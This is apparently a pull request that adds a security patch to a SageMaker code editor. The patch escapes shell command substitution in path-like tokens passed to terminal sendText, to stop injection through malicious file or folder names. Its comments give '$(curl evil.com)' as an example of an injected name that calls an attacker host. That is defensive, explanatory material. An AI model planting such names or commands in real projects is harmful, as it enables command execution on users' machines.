### PR TITLE
fix(security): Sanitize all path-like segments in terminal sendText

### DIFF
--- a/patches/sagemaker.series
+++ b/patches/sagemaker.series
@@ -48,4 +48,5 @@ sagemaker/sagemaker-extensions-sync.diff
 sagemaker/fix-port-forwarding.diff
 sagemaker/display-both-versions-in-about.diff
 sagemaker/validate-http-request-referer.diff
+sagemaker/sanitize-terminal-sendtext-paths.diff
 sagemaker/override-picomatch-post-startup-notifications.diff

--- a/patches/sagemaker/sanitize-terminal-sendtext-paths.diff
+++ b/patches/sagemaker/sanitize-terminal-sendtext-paths.diff
@@ -1,0 +1,86 @@
+Sanitize command substitution in path-like segments of terminal sendText
+
+File/folder names containing shell metacharacters (e.g., $(curl evil.com)
+or `cmd`) can trigger command injection when extensions send commands via
+terminal.sendText(). This patch escapes $() and backtick command
+substitution patterns inside path-like tokens (both double-quoted and
+unquoted) before the text is written to the terminal process.
+
+Single-quoted paths are left alone since the shell does not interpret
+special characters inside single quotes. Non-path tokens like $HOME in
+"echo $HOME" are also left untouched to preserve intentional variable
+usage.
+
+Index: b/src/vs/platform/terminal/common/terminalEnvironment.ts
+===================================================================
+--- a/src/vs/platform/terminal/common/terminalEnvironment.ts
++++ b/src/vs/platform/terminal/common/terminalEnvironment.ts
+@@ -126,3 +126,46 @@ export function sanitizeCwd(cwd: string)
+ export function shouldUseEnvironmentVariableCollection(slc: IShellLaunchConfig): boolean {
+ 	return !slc.strictEnv;
+ }
++
++/**
++ * Sanitize shell command substitution patterns in path-like segments
++ * of terminal commands to prevent injection via malicious folder/file names.
++ *
++ * Targets: $(...), ${...}, and `...` inside path-like tokens.
++ * A path-like token starts with /, ~/, ./, ../ or is a quoted string containing /.
++ */
++export function sanitizeCdPathsInCommand(text: string): string {
++	// Strip newlines and null bytes to prevent command injection via line splitting
++	let result = text.replace(/[\r\n\x00]/g, ' ');
++
++	// Handle double-quoted path segments: "...path..."
++	// Only escape command substitution patterns $( and ` and ${ — NOT bare $VAR
++	result = result.replace(
++		/"((?:[^"\\]|\\.)*\/(?:[^"\\]|\\.)*)"/g,
++		(_match: string, inner: string) => {
++			const sanitized = inner
++				.replace(/(?<!\\)\$\(/g, '\\$(')
++				.replace(/(?<!\\)\$\{/g, '\\${')
++				.replace(/(?<!\\)`/g, '\\`');
++			return `"${sanitized}"`;
++		}
++	);
++
++	// Handle unquoted path-like segments (any token containing /)
++	// This catches absolute, relative, and bare paths like foo/$(evil)/bar
++	result = result.replace(
++		/(?<=[\s;|&<>]|^)([^\s;|&<>]*\/[^\s;|&<>]*)/gm,
++		(pathToken: string) => {
++			// Skip already-quoted paths — handled above or safe (single quotes)
++			if (pathToken.startsWith("'") || pathToken.startsWith('"')) {
++				return pathToken;
++			}
++			return pathToken
++				.replace(/(?<!\\)\$\(/g, '\\$(')
++				.replace(/(?<!\\)\$\{/g, '\\${')
++				.replace(/(?<!\\)`/g, '\\`');
++		}
++	);
++
++	return result;
++}
+Index: b/src/vs/workbench/contrib/terminal/browser/terminalInstance.ts
+===================================================================
+--- a/src/vs/workbench/contrib/terminal/browser/terminalInstance.ts
++++ b/src/vs/workbench/contrib/terminal/browser/terminalInstance.ts
+@@ -48,6 +48,7 @@ import { IEnvironmentVariableCollection,
+ import { deserializeEnvironmentVariableCollections } from '../../../../platform/terminal/common/environmentVariableShared.js';
+ import { GeneralShellType, IProcessDataEvent, IProcessPropertyMap, IReconnectionProperties, IShellLaunchConfig, ITerminalDimensionsOverride, ITerminalLaunchError, ITerminalLogService, PosixShellType, ProcessPropertyType, ShellIntegrationStatus, TerminalExitReason, TerminalIcon, TerminalLocation, TerminalSettingId, TerminalShellType, TitleEventSource, WindowsShellType, type ShellIntegrationInjectionFailureReason } from '../../../../platform/terminal/common/terminal.js';
+ import { formatMessageForTerminal } from '../../../../platform/terminal/common/terminalStrings.js';
++import { sanitizeCdPathsInCommand } from '../../../../platform/terminal/common/terminalEnvironment.js';
+ import { editorBackground } from '../../../../platform/theme/common/colorRegistry.js';
+ import { getIconRegistry } from '../../../../platform/theme/common/iconRegistry.js';
+ import { IColorTheme, IThemeService } from '../../../../platform/theme/common/themeService.js';
+@@ -1341,6 +1342,9 @@ export class TerminalInstance extends Di
+ 	}
+ 
+ 	async sendText(text: string, shouldExecute: boolean, bracketedPasteMode?: boolean): Promise<void> {
++		// Sanitize command substitution patterns ($(), ${}, ``) in path-like segments
++		// to prevent injection via malicious folder/file names (e.g., $(curl evil.com))
++		text = sanitizeCdPathsInCommand(text);
+ 		// Apply bracketed paste sequences if the terminal has the mode enabled, this will prevent
+ 		// the text from triggering keybindings and ensure new lines are handled properly
+ 		if (bracketedPasteMode && this.xterm?.raw.modes.bracketedPasteMode) {


### PR DESCRIPTION
Broaden `sanitizeCdPathsInCommand()` to escape command substitution patterns `($(), ${}, backticks) `in all path-like tokens, not just `cd arguments`. Also strips newlines and null bytes to prevent line splitting injection.

## Issue
<!-- Please add just the issue number (e.g., D316398873) - do not paste the full link -->
- P381721885


## Description of Changes
<!-- Provide a clear and concise description of what changes you made and why -->
- Sanitize folder paths

## Testing
<!-- Describe how you tested this change. -->
- Applied patches successfully and validated using BYOI

## Backporting
<!-- Consider if this change needs to be back-ported to previous active versions. -->
<!-- If the change needs to be backported, then please create separate PRs for version branches
and create a new release if required. -->

- NA
---

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.